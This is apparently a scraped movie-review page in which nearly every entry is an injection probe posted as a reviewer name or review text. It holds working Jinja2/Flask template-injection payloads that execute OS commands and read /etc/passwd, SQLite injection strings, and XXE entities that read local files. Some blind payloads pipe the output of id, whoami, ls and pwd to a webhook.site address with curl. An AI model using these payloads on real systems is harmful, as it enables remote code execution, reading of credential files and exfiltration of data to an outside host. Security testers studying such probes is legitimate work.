{# comment #}test (Dec 31, 2025 11:03 AM)
test
-
normaluser (Dec 31, 2025 11:03 AM)
{{7*7}}
-
{{7_7}} (Dec 31, 2025 11:03 AM)
test
-
{{7*7}} (Dec 31, 2025 11:03 AM)
test
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
- anonymous (Dec 31, 2025 11:03 AM)
-
TestUser (Dec 31, 2025 11:03 AM)
{{dict(a=1)|string}}
-
TestUser (Dec 31, 2025 11:03 AM)
{{[1,2,3]|length}}
-
TestUser (Dec 31, 2025 11:03 AM)
{{range(5)|list}}
-
TestUser (Dec 31, 2025 11:03 AM)
{{7*7*7}}
-
TestUser (Dec 31, 2025 11:02 AM)
{{7*7}}
-
BLIND_TEST (Dec 31, 2025 11:02 AM)
BLIND_TEST: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('curl https://webhook.site/2ce90f1d-f7e1-42de-8da7-d0146146adc1/test').read() %}{% if x %}CALLBACK{% endif %}
-
BLIND_LS (Dec 31, 2025 11:02 AM)
BLIND_LS: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('ls -la | curl -d @- https://webhook.site/2ce90f1d-f7e1-42de-8da7-d0146146adc1/ls').read() %}{% if x %}SENT{% endif %}
-
BLIND_PWD (Dec 31, 2025 11:02 AM)
BLIND_PWD: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('pwd | curl -d @- https://webhook.site/2ce90f1d-f7e1-42de-8da7-d0146146adc1/pwd').read() %}{% if x %}SENT{% endif %}
-
{{'test'+'user'}} (Dec 31, 2025 11:02 AM)
Re-verification test
-
BLIND_ID (Dec 31, 2025 11:02 AM)
BLIND_ID: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('id | curl -d @- https://webhook.site/2ce90f1d-f7e1-42de-8da7-d0146146adc1/id').read() %}{% if x %}SENT{% endif %}
-
BLIND_WHOAMI (Dec 31, 2025 11:02 AM)
BLIND_WHOAMI: {% set x = lipsum.__globals__.__builtins__.__import__('os').popen('whoami | curl -d @- https://webhook.site/2ce90f1d-f7e1-42de-8da7-d0146146adc1/whoami').read() %}{% if x %}SENT{% endif %}
-
USER_' || sqlite_version() || '_END (Dec 31, 2025 11:02 AM)
Normal content
-
sqli_tester (Dec 31, 2025 11:02 AM)
SQLI_TEST_' || sqlite_version() || '_END
-
{{lipsum.__globals__.os.popen('head -1 /etc/passwd').read()}} (Dec 31, 2025 11:02 AM)
Test: RCE - Read /etc/passwd first line
-
{{lipsum.__globals__.os.popen('pwd').read()}} (Dec 31, 2025 11:02 AM)
Test: RCE via lipsum - pwd
-
{{lipsum.__globals__.os.popen('id').read()}} (Dec 31, 2025 11:02 AM)
Test: RCE via lipsum - id
-
{{lipsum.__globals__.os.popen('whoami').read()}} (Dec 31, 2025 11:02 AM)
Test: RCE via lipsum - whoami
-
{{config}} (Dec 31, 2025 11:02 AM)
Test: Flask config object
-
{{'X'*10}} (Dec 31, 2025 11:02 AM)
Test: String multiplication
-
{{7*7}} (Dec 31, 2025 11:02 AM)
Test: Simple multiplication
-
{{'HELLO'+'WORLD'}} (Dec 31, 2025 11:02 AM)
Test: String concatenation
-
{{7*7}} (Dec 31, 2025 11:01 AM)
Test review with SSTI
-
NS_RCE (Dec 31, 2025 11:01 AM)
NS_RCE: {% set ns = namespace(output='') %}{% set ns.output = lipsum.__globals__['__builtins__']['__import__']('os').popen('pwd').read() %}{{ns.output}}
-
LOOP_RCE (Dec 31, 2025 11:01 AM)
LOOP_RCE: {% for x in [lipsum.__globals__.__builtins__.__import__('os').popen('id').read()] %}{{x}}{% endfor %}
-
FILTER_RCE (Dec 31, 2025 11:01 AM)
FILTER_RCE: {% filter upper %}{% set x = lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read() %}{{x}}{% endfilter %}
-
{{'HELLO'+'WORLD'}} (Dec 31, 2025 11:01 AM)
SSTI string concat test
-
FINDME_1767178895 (Dec 31, 2025 11:01 AM)
Where am I in the HTML?
-
{{7*7}} (Dec 31, 2025 11:01 AM)
Test review
-
testuser (Dec 31, 2025 11:01 AM)
test' || (SELECT COUNT(*) FROM sqlite_master, sqlite_master, sqlite_master) || '
-
testuser (Dec 31, 2025 11:01 AM)
test' || (SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name LIKE '%' || randomblob(10000000)) || '
-
testuser (Dec 31, 2025 11:01 AM)
baseline_test_2
-
testuser (Dec 31, 2025 11:01 AM)
baseline_test_1
-
testuser (Dec 31, 2025 11:01 AM)
baseline_test_0
-
testuser (Dec 31, 2025 11:01 AM)
test' || sqlite_version() || '
-
testuser (Dec 31, 2025 11:01 AM)
test' || (SELECT CASE WHEN 1=2 THEN 'TRUE' ELSE 'FALSE' END) || '
-
RCE_STMT_4 (Dec 31, 2025 11:01 AM)
RCE_STMT_4: {% set r = request.application.__globals__.__builtins__.__import__('os').popen('id').read() %}{{r}}
-
testuser (Dec 31, 2025 11:01 AM)
test' || (SELECT CASE WHEN 1=1 THEN 'TRUE' ELSE 'FALSE' END) || '
-
RCE_STMT_3 (Dec 31, 2025 11:01 AM)
RCE_STMT_3: {% set cmd = lipsum.__globals__.__builtins__.__import__('os').popen('whoami').read() %}{% if cmd %}{{cmd}}{% endif %}
-
RCE_STMT_2 (Dec 31, 2025 11:01 AM)
RCE_STMT_2: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'Popen' %}POPEN_FOUND{% endif %}{% endfor %}
-
testuser (Dec 31, 2025 11:01 AM)
UNIQUE_TEST_1767178875
-
RCE_STMT_1 (Dec 31, 2025 11:01 AM)
RCE_STMT_1: {% set os = namespace.__init__.__globals__.os %}{% if os %}OS_IMPORTED{% endif %}
-
{{'SSTI_1767178874'}} (Dec 31, 2025 11:01 AM)
SSTI marker test
-
StmtTest (Dec 31, 2025 11:01 AM)
TEST_Config access via set: {% set c = config %}{% if c %}CONFIG_FOUND{% endif %}
-
TEST_USER_1767178872 (Dec 31, 2025 11:01 AM)
Debug test review
-
StmtTest (Dec 31, 2025 11:01 AM)
TEST_For loop test: {% for i in range(3) %}{{i}}{% endfor %}
-
StmtTest (Dec 31, 2025 11:01 AM)
TEST_Set variable and print: {% set x = 7*7 %}{% if x %}{{x}}{% endif %}
-
StmtTest (Dec 31, 2025 11:01 AM)
TEST_If with math result: {% if 7*7 %}Result:49{% endif %}
-
StmtTest (Dec 31, 2025 11:01 AM)
TEST_Basic if statement: {% if 7*7 %}EXECUTED{% endif %}
-
{{'A'*5}} (Dec 31, 2025 11:00 AM)
Math test
-
{{99+1}} (Dec 31, 2025 11:00 AM)
Math test
-
{{13*13}} (Dec 31, 2025 11:00 AM)
Math test
-
{{7*7}} (Dec 31, 2025 11:00 AM)
Math test
-
{{lipsum.__globals__.os.popen('id').read()}} (Dec 31, 2025 11:00 AM)
HTML parsing test
-
test' AND '1'='1 (Dec 31, 2025 11:00 AM)
Test review
-
test'-- (Dec 31, 2025 11:00 AM)
Test review
-
" (Dec 31, 2025 11:00 AM)
Test review
-
' (Dec 31, 2025 11:00 AM)
Test review
-
testuser (Dec 31, 2025 11:00 AM)
test' AND '1'='1
-
testuser (Dec 31, 2025 11:00 AM)
test'--
-
testuser (Dec 31, 2025 11:00 AM)
"
-
testuser (Dec 31, 2025 11:00 AM)
'
-
testuser (Dec 31, 2025 11:00 AM)
Great movie!
-
{{lipsum.__globals__.os.popen('echo SSTI_CONFIRMED_12345').read()}} (Dec 31, 2025 11:00 AM)
Distinctive marker test
-
{{lipsum.__globals__.os.popen('whoami').read()}} (Dec 31, 2025 11:00 AM)
Command execution verification
- {{config.items()}} (Dec 31, 2025 10:59 AM)
- {{41*37}} (Dec 31, 2025 10:59 AM)
- {{13*37}} (Dec 31, 2025 10:59 AM)
-
{{get_flashed_messages.__globals__['__builtins__']['__import__']('os').popen('echo RCE_MARKER_9').read()}} (Dec 31, 2025 10:59 AM)
RCE test 10
-
{{url_for.__globals__['__builtins__']['__import__']('os').popen('echo RCE_MARKER_8').read()}} (Dec 31, 2025 10:59 AM)
RCE test 9
-
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("echo RCE_MARKER_7").read()')}} (Dec 31, 2025 10:59 AM)
RCE test 8
-
{{lipsum.__globals__.os.popen('echo RCE_MARKER_6').read()}} (Dec 31, 2025 10:59 AM)
RCE test 7
-
{{''.format.__globals__['__builtins__']['__import__']('os').popen('echo RCE_MARKER_5').read()}} (Dec 31, 2025 10:59 AM)
RCE test 6
-
{{namespace.__init__.__globals__.os.popen('echo RCE_MARKER_4').read()}} (Dec 31, 2025 10:59 AM)
RCE test 5
-
{{joiner.__init__.__globals__.os.popen('echo RCE_MARKER_3').read()}} (Dec 31, 2025 10:59 AM)
RCE test 4
-
{{cycler.__init__.__globals__.os.popen('echo RCE_MARKER_2').read()}} (Dec 31, 2025 10:59 AM)
RCE test 3
-
{{request.application.__globals__.__builtins__.__import__('os').popen('echo RCE_MARKER_1').read()}} (Dec 31, 2025 10:59 AM)
RCE test 2
-
{{''.__class__.__mro__[1].__subclasses__()[396]('echo RCE_TEST',shell=True,stdout=-1).communicate()[0].strip()}} (Dec 31, 2025 10:59 AM)
RCE test 1
-
ALT_RCE_6 (Dec 31, 2025 10:59 AM)
ALT_RCE_6: {{namespace.__init__.__globals__.os.popen('pwd').read()}}
-
ALT_RCE_5 (Dec 31, 2025 10:59 AM)
ALT_RCE_5: {{joiner.__init__.__globals__.os.popen('id').read()}}
-
ALT_RCE_4 (Dec 31, 2025 10:59 AM)
ALT_RCE_4: {{cycler.__init__.__globals__.os.popen('whoami').read()}}
-
ALT_RCE_3 (Dec 31, 2025 10:59 AM)
ALT_RCE_3: {{lipsum.__globals__.__builtins__.__import__('os').popen('pwd').read()}}
-
ALT_RCE_2 (Dec 31, 2025 10:59 AM)
ALT_RCE_2: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
-
ALT_RCE_1 (Dec 31, 2025 10:59 AM)
ALT_RCE_1: {{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
-
BasicTest (Dec 31, 2025 10:59 AM)
CONFIG_TEST: {{config.SECRET_KEY}}
-
BasicTest (Dec 31, 2025 10:59 AM)
STRING_TEST: {{7*'7'}}
-
BasicTest (Dec 31, 2025 10:59 AM)
MATH_TEST: {{7*7}}
-
{{'test'+'user'}} (Dec 31, 2025 10:59 AM)
Verification test for SSTI
-
xxe_file_app_config (Dec 31, 2025 10:59 AM)
]>
&xxe; -
xxe_file_proc_self_environ (Dec 31, 2025 10:59 AM)
]>
&xxe; -
xxe_file_etc_hostname (Dec 31, 2025 10:58 AM)
]>
&xxe; -
xxe_file_etc_passwd (Dec 31, 2025 10:58 AM)
]>
&xxe; -
MarkerTest (Dec 31, 2025 10:58 AM)
MARKER_{{7*7}}_END
- ssti_validator_config (Dec 31, 2025 10:58 AM)
- ssti_validator_unique (Dec 31, 2025 10:58 AM)
-
{{lipsum.__globals__['os'].popen('pwd').read()}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
- baseline_test_user (Dec 31, 2025 10:58 AM)
-
{{lipsum.__globals__['os'].popen('whoami').read()}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
blind_xxe_simple_external_entity (Dec 31, 2025 10:58 AM)
]>
&xxe; -
blind_xxe_external_dtd (Dec 31, 2025 10:58 AM)
%dtd; ]>
&all; -
blind_xxe_parameter_entity_dtd (Dec 31, 2025 10:58 AM)
%dtd; ]>
&all; -
{{config.__class__.__init__.__globals__['os'].popen('id').read()}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
{{7*191}} (Dec 31, 2025 10:58 AM)
Test review for SSTI validation
-
{{config.items()}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
{{config}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
user{{7*7}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
RCE_LS (Dec 31, 2025 10:58 AM)
RCE_LS: {{''.__class__.__mro__[1].__subclasses__()[396]('ls -la',shell=True,stdout=-1).communicate()[0].strip()}}
-
{{'test'+'user'}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
RCE_PWD (Dec 31, 2025 10:58 AM)
RCE_PWD: {{''.__class__.__mro__[1].__subclasses__()[396]('pwd',shell=True,stdout=-1).communicate()[0].strip()}}
-
{{9*9}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
RCE_ID (Dec 31, 2025 10:58 AM)
RCE_ID: {{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}}
-
{{7*7}} (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
RCE_WHOAMI (Dec 31, 2025 10:58 AM)
RCE_WHOAMI: {{''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True,stdout=-1).communicate()[0].strip()}}
-
john_doe (Dec 31, 2025 10:58 AM)
This is a test review for SSTI testing
-
PopenFinder (Dec 31, 2025 10:58 AM)
{% for i in range(600) %}{% if ''.__class__.__mro__[1].__subclasses__()[i].__name__ == 'Popen' %}INDEX:{{i}}{% endif %}{% endfor %}
-
FinalTest (Dec 31, 2025 10:57 AM)
FINAL_TEST_{{7*7}}_MARKER
-
RCE_Test (Dec 31, 2025 10:57 AM)
{{''.__class__.__mro__[1].__subclasses__()}}
-
RCE_Test (Dec 31, 2025 10:57 AM)
{{''.__class__.__mro__}}
-
RCE_Test (Dec 31, 2025 10:57 AM)
{{''.__class__}}
-
{{7*7}} (Dec 31, 2025 10:56 AM)
Testing username field
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('pwd').read()}}
-
TestUser (Dec 31, 2025 10:56 AM)
{{config.items()}}
-
TestUser (Dec 31, 2025 10:56 AM)
{{config}}
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{lipsum.__globals__['os'].popen('whoami').read()}}
-
TestUser (Dec 31, 2025 10:56 AM)
{{7*'7'}}
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
-
TestUser (Dec 31, 2025 10:56 AM)
{{7*7}}
-
TestUser (Dec 31, 2025 10:56 AM)
This is a normal review
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{self}}
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{config}}
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{4*4}}
-
ssti_tester (Dec 31, 2025 10:56 AM)
Review rating: {{7*7}} stars
-
ssti_tester (Dec 31, 2025 10:56 AM)
{{7*7}}
-
ssti_tester (Dec 31, 2025 10:56 AM)
This is a normal review
- anonymous (Dec 31, 2025 10:54 AM)
- anonymous (Dec 31, 2025 10:54 AM)
- anonymous (Dec 31, 2025 10:54 AM)
- anonymous (Dec 31, 2025 10:54 AM)
-
xxe_test_user (Dec 31, 2025 10:54 AM)
]>
&xxe; -
FileReader (Dec 31, 2025 10:53 AM)
{{open('/etc/passwd').read()}}
-
RCETester (Dec 31, 2025 10:53 AM)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
-
SSTITester (Dec 31, 2025 10:53 AM)
SSTI_TEST_{{7*7}}_RESULT
-
test (Dec 31, 2025 10:53 AM)
]>
&xxe; -
test (Dec 31, 2025 10:53 AM)
test - testuser (Dec 31, 2025 10:53 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('echo USERNAME_RCE_TEST',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:53 AM)
- testuser (Dec 31, 2025 10:53 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396].__init__.__globals__['__builtins__']['__import__']('subprocess').Popen('id',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/hostname',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('uname -a',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('pwd',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('echo SSTI_CONFIRMED',shell=True,stdout=-1).communicate() }} (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True) }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True) }} (Dec 31, 2025 10:52 AM)
- {{ open('/etc/hostname').read() }} (Dec 31, 2025 10:52 AM)
- {{ open('/etc/passwd').read() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__()[396] }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1].__subclasses__() }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__[1] }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__.__mro__ }} (Dec 31, 2025 10:52 AM)
- {{ ''.__class__ }} (Dec 31, 2025 10:52 AM)
- {{ 'hello'[:2] }} (Dec 31, 2025 10:52 AM)
- {{ 'test'|length }} (Dec 31, 2025 10:52 AM)
- {{ 'a' + 'b' }} (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
- testuser (Dec 31, 2025 10:52 AM)
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{''.__class__.__mro__}}
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{''.__class__}}
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{request.application}}
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{request}}
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{self}}
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{config}}
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{7*7*7}}
-
SSTI_Tester (Dec 31, 2025 10:51 AM)
{{7*7}}
-
{{7*7}} (Dec 31, 2025 10:51 AM)
Test
- {{self.__class__}} (Dec 31, 2025 10:51 AM)
- {{self.__dict__}} (Dec 31, 2025 10:51 AM)
- {{self}} (Dec 31, 2025 10:51 AM)
- {{request.args}} (Dec 31, 2025 10:51 AM)
- {{request.environ}} (Dec 31, 2025 10:51 AM)
- {{request}} (Dec 31, 2025 10:51 AM)
- {{config.keys()}} (Dec 31, 2025 10:51 AM)
- {{config.items()}} (Dec 31, 2025 10:51 AM)
- {{config}} (Dec 31, 2025 10:51 AM)
- {{10-5}} (Dec 31, 2025 10:51 AM)
- {{2+2}} (Dec 31, 2025 10:51 AM)
- {{4*4}} (Dec 31, 2025 10:51 AM)
- {{7*7}} (Dec 31, 2025 10:51 AM)
- testuser (Dec 31, 2025 10:51 AM)
- testuser (Dec 31, 2025 10:51 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
- testuser (Dec 31, 2025 10:50 AM)
-
{{11*11}} (Dec 31, 2025 10:50 AM)
Verification test for SSTI in username field
-
{{global.process}} (Dec 31, 2025 10:50 AM)
Test review 3
-
{{this}} (Dec 31, 2025 10:50 AM)
Test review 2
-
{{constructor}} (Dec 31, 2025 10:50 AM)
Test review 1
-
{{9*9}} (Dec 31, 2025 10:49 AM)
Review content: {{10*10}}
-
TestUser_SSTI (Dec 31, 2025 10:49 AM)
{{8*8}}
-
{{7*7}} (Dec 31, 2025 10:49 AM)
This is a normal review content for testing
-
{{request}} (Dec 31, 2025 10:49 AM)
Test review content
-
{{config}} (Dec 31, 2025 10:49 AM)
Test review content
-
{%if 7==7%}YES{%endif%} (Dec 31, 2025 10:49 AM)
Test review content
-
{{''.__class__}} (Dec 31, 2025 10:49 AM)
Test review content
-
{{7*7}} (Dec 31, 2025 10:49 AM)
Test review content
-
validator_test_8837 (Dec 31, 2025 10:44 AM)
{{7*191}}
-
{{#if (eq 1 999)}}FALSE_177889{{/if}} (Dec 31, 2025 10:44 AM)
Test review 177889
-
Sarah Mitchell (Dec 31, 2025 10:44 AM)
Inception is a masterpiece of modern cinema. The plot is intricate and engaging, with excellent performances from the entire cast. Highly recommended!
- TestReviewer (Dec 31, 2025 10:43 AM)
-
validator_8720 (Dec 31, 2025 10:42 AM)
{{41*37}}
-
validator_8514 (Dec 31, 2025 10:42 AM)
{{17*23}}
-
validator_1600 (Dec 31, 2025 10:42 AM)
{{13*37}}
-
validator_3016 (Dec 31, 2025 10:42 AM)
{{request}}
-
validator_7902 (Dec 31, 2025 10:42 AM)
{{100-1}}
-
validator_9859 (Dec 31, 2025 10:41 AM)
{{7+7}}
-
validator_8633 (Dec 31, 2025 10:41 AM)
{{config}}
-
testuser (Dec 31, 2025 10:41 AM)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
-
testuser (Dec 31, 2025 10:41 AM)
{{config}}
-
testuser (Dec 31, 2025 10:41 AM)
{{7*7}}
-
validator_7501 (Dec 31, 2025 10:41 AM)
{{config}}
-
validator_8837 (Dec 31, 2025 10:41 AM)
{{7*191}}
-
TestUser (Dec 31, 2025 10:37 AM)
{{#if (eq 3 3)}}SSTI_CONTENT{{/if}}
-
{{#if (eq 5 5)}}SSTI_USER{{/if}} (Dec 31, 2025 10:37 AM)
Test
-
testuser (Dec 31, 2025 10:37 AM)
{{ range(10) | select('odd') | list }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ range(10) | list }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ ''.__class__.__mro__[1].__subclasses__() | list }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ request.form }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ request.args }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ request.headers }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ request.environ }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ config.values() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ config.items() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ config.keys() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ [].__class__.__bases__[0].__subclasses__()[104].__init__.__globals__['os'].popen('id').read() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ {}.__class__.__bases__[0].__subclasses__()[104].__init__.__globals__['os'].popen('id').read() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ namespace.__init__.__globals__['os'].popen('id').read() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ joiner.__init__.__globals__['os'].popen('id').read() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ cycler.__init__.__globals__['os'].popen('id').read() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ lipsum.__init__.__globals__['os'].popen('id').read() }}
-
testuser (Dec 31, 2025 10:37 AM)
{{ '{0.__class__.__bases__[0].__subclasses__()[104].__init__.__globals__["sys"].modules["os"].popen("id").read()}'.format(request) }}
-
TestUser (Dec 31, 2025 10:37 AM)
{{#if (eq 2 2)}}STORED_SSTI{{/if}}
-
{{#if (eq 7 7)}}SSTI_CONFIRMED{{/if}} (Dec 31, 2025 10:36 AM)
Test review
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('ls /').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('uname -a').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('pwd').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{config.get('APP_NAME', 'unknown')}}
-
testuser (Dec 31, 2025 10:36 AM)
{{config.ENV}}
-
testuser (Dec 31, 2025 10:36 AM)
{{config.DEBUG}}
-
testuser (Dec 31, 2025 10:36 AM)
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True)}}
-
testuser (Dec 31, 2025 10:36 AM)
{{lipsum.__init__.__globals__.os.popen('id').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{cycler.__init__.__globals__.os.popen('id').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('pwd').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
-
testuser (Dec 31, 2025 10:36 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
-
TestUser (Dec 31, 2025 10:35 AM)
{{config}}
-
TestUser (Dec 31, 2025 10:35 AM)
{{7*7}}
-
{{2+2}} (Dec 31, 2025 10:35 AM)
Nice
-
{{7*7}} (Dec 31, 2025 10:35 AM)
Good movie
-
testuser (Dec 31, 2025 10:35 AM)
{{config}}
-
testuser (Dec 31, 2025 10:35 AM)
{{4*4}}
-
testuser (Dec 31, 2025 10:35 AM)
{{7*7}}
-
testuser (Dec 31, 2025 10:35 AM)
{{cycler.__init__.__globals__.os.popen('id').read()}}
-
testuser (Dec 31, 2025 10:35 AM)
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True)}}
-
testuser (Dec 31, 2025 10:35 AM)
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
-
testuser (Dec 31, 2025 10:35 AM)
{{request}}
-
testuser (Dec 31, 2025 10:35 AM)
{{config}}
-
testuser (Dec 31, 2025 10:35 AM)
{{4*4}}
-
testuser (Dec 31, 2025 10:35 AM)
{{7*7}}
-
testuser (Dec 31, 2025 10:32 AM)
{{7*7}}
-
testuser (Dec 31, 2025 10:32 AM)
{{config.__class__.__init__.__globals__['os'].popen('ls -la /').read()}}
-
testuser (Dec 31, 2025 10:32 AM)
{{config.__class__.__init__.__globals__['os'].popen('pwd').read()}}
-
testuser (Dec 31, 2025 10:32 AM)
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
-
testuser (Dec 31, 2025 10:32 AM)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
-
testuser (Dec 31, 2025 10:32 AM)
{{config.__class__.__init__.__globals__['os']}}
-
testuser (Dec 31, 2025 10:32 AM)
{{config}}
-
testuser (Dec 31, 2025 10:32 AM)
{{7*7}}
-
testuser (Dec 31, 2025 10:31 AM)
{{lipsum.__class__.__init__.__globals__['os'].popen('id').read()}}
-
testuser (Dec 31, 2025 10:31 AM)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
-
testuser (Dec 31, 2025 10:31 AM)
{{request}}
-
testuser (Dec 31, 2025 10:31 AM)
{{config}}
-
testuser (Dec 31, 2025 10:31 AM)
{{ 7 * 7 }}
-
testuser (Dec 31, 2025 10:31 AM)
{{7*7}}
-
test (Dec 31, 2025 10:27 AM)
{{7*7}}
-
{{7*7}} (Dec 31, 2025 10:27 AM)
test
-
REVIEW_USER_SSTI_{{7*7}}_1767170754 (Dec 31, 2025 08:46 AM)
Test review for username SSTI testing
-
ssti_reviewer4_1767170509 (Dec 31, 2025 08:41 AM)
REVIEW_SSTI_TEST_4: {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
-
ssti_reviewer3_1767170509 (Dec 31, 2025 08:41 AM)
REVIEW_SSTI_TEST_3: {{config}}
-
ssti_reviewer2_1767170509 (Dec 31, 2025 08:41 AM)
REVIEW_SSTI_TEST_2: {{7*'7'}}
-
ssti_reviewer1_1767170509 (Dec 31, 2025 08:41 AM)
REVIEW_SSTI_TEST_1: {{7*7}}
-
baseline_reviewer_1767170509 (Dec 31, 2025 08:41 AM)
This is a baseline test review.
-
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root> (Dec 31, 2025 08:39 AM)
test
-
test_with_header (Dec 31, 2025 08:39 AM)
test
-
test_no_header (Dec 31, 2025 08:39 AM)
test
-
csrf_test (Dec 31, 2025 08:39 AM)
CSRF test
-
